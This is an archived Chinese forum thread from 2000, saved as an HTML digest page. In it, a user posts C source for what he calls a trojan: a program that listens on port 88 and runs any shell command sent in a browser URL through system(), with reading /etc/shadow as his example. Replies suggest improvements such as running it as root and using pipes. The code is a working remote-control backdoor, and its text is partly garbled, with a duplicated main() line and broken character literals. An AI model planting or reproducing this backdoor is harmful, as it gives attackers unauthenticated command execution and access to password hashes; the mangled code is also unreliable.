443.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="318.htm">上一层</a>][<a href="444.htm">下一篇</a>]
<hr><p align="left"><small>抛块砖头 <br>
---------------------------------------------------------------------------- <br>
---- <br>
 Blackfire 于 00-6-15 17:42:59 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统 <br>
安全： <br>
    以下的程序算是一个小小的木马吧，设计目的是通过浏览器来控制远程UNIX系统。 <br>
比如输入 http://192.168.0.111:88/cat /etc/shadow 就能在浏览器里看到 /etc/sha <br>
dow 的内容。目前也就这些可以，比如 ls 等只有输出的命令好使，象 vi 这样的程序 <br>
就有些麻烦了。抛砖引玉嘛。 <br>
/* <br>
* Author: bobdai <br>
* Email : bobdai@sohu.com <br>
* Homepage: http://bobdai.126.com <br>
* <br>
* Jun 15, 2000 <br>
*/ <br>
#include    <stdio.h> <br>
#include    <unistd.h> <br>
#include    <string.h> <br>
#include    <netinet/in.h> <br>
#include    <sys/socket.h> <br>
#define     SA struct sockaddr <br>
main() <br>
main() <br>
{ <br>
    int     n, listenfd, connfd; <br>
    char    rbuf[1024], wbuf[1024], cbuf[256], *str; <br>
    FILE    *fp; <br>
    struct  sockaddr_in  servaddr; <br>
    if( (listenfd=socket(AF_INET, SOCK_STREAM, 0)) <0 ) <br>
        perror( "socket" ), exit(0); <br>
    bzero( &servaddr, sizeof(servaddr) ); <br>
    servaddr.sin_family = AF_INET; <br>
    servaddr.sin_addr.s_addr = htonl( INADDR_ANY ); <br>
    servaddr.sin_port = htons( 88 ); <br>
    if( bind(listenfd, (SA *)&servaddr, sizeof(servaddr)) <0 ) <br>
        perror( "bind" ), exit(0); <br>
    if( listen(listenfd, 10) <0 ) <br>
        perror( "listen" ), exit(0); <br>
    for(;;) <br>
    { <br>
        bzero( cbuf, 256 ); <br>
        bzero( wbuf, 1024); <br>
        if( (connfd=accept(listenfd, (SA *)NULL, NULL)) <0 ) <br>
            perror( "accept" ), exit(0); <br>
        if( read(connfd, rbuf, 1024) <0 ) <br>

            perror( "read" ), exit(0); <br>
        if( (fp=fopen("~~~tempfile~~~", "w")) == NULL) <br>
            perror( "open tempfile error"), exit(0); <br>
        fclose( fp ); <br>
        str = strstr( rbuf, "GET /" ); <br>
        str += 5; <br>
        for( n=0; *str != '' ''; n++ ) <br>
        { <br>
            if( *str == ''%'' ) <br>
            { <br>
                str += 3; <br>
                *(cbuf+n) = '' ''; <br>
            } <br>
            else *(cbuf+n)=*(str++); <br>
        } <br>
        strcat( cbuf, ">~~~tempfile~~~" ); <br>
        printf( "%s\n", cbuf ); <br>
        system( cbuf ); <br>
        if( (fp=fopen("~~~tempfile~~~", "r")) == NULL) <br>
            perror( "open tempfile error"), exit(0); <br>
        strcpy( wbuf, "Result:<br>" ); <br>
        if( write(connfd, wbuf, strlen(wbuf)) <0 ) <br>

            perror( "write" ), exit(0); <br>
        fgets( wbuf, 1000, fp ); <br>
        while( !feof(fp) ) <br>
        { <br>
            strcat( wbuf, "<br>" ); <br>
            if( write(connfd, wbuf, strlen(wbuf)) <0 ) <br>
                perror( "write" ), exit(0); <br>
            fgets( wbuf, 1000, fp ); <br>
        } <br>
        fclose( fp ); <br>
        unlink( "~~~tempfile~~~" ); <br>
        close( connfd ); <br>
    } <br>
} <br>
---------------------------------------------------------------------------- <br>
---- <br>
 cloudsky 于 00-6-15 20:34:40 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统 <br>
安全： <br>
vi是用curses实现得。这种东西都需要控制终端(不是主控台)的。 <br>
你这个东西本身得以root身份启动才能访问特权文件。 <br>
此外能否考虑不要用临时文件呢？没仔细想。不过觉得用pipe()或者 <br>
输入输出重定向(dup2())应该好些。 <br>

---------------------------------------------------------------------------- <br>
---- <br>
 Blackfire 于 00-6-15 21:39:37 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统 <br>
安全： <br>
    很多方面我都没有仔细想的，不过既然想法产生了，就先将就用些临时的东西先实 <br>
现了看看。至于具体细节，就不是几分钟的编程就能实现的了。 <br>
    vi 的实现我看也并非没有可能嘛，他也无非要一个标准输入输出的，再看看了。我 <br>
本人觉得这个想法挺有意思，有时间一定完善之！ <br>
---------------------------------------------------------------------------- <br>
---- <br>
 cloudsky 于 00-6-15 22:07:42 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统 <br>
安全： <br>
无非是要标准输入输出？ <br>
错了，vi用curses的时候根本和标准输入输出无关。都是自己的终端设备文件。 <br>
在水木清华的Unix版精华区里有一点curses编程的资料，这些东西台湾BBS居多， <br>
可以去那边看看。 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="318.htm">上一层</a>][<a href="444.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>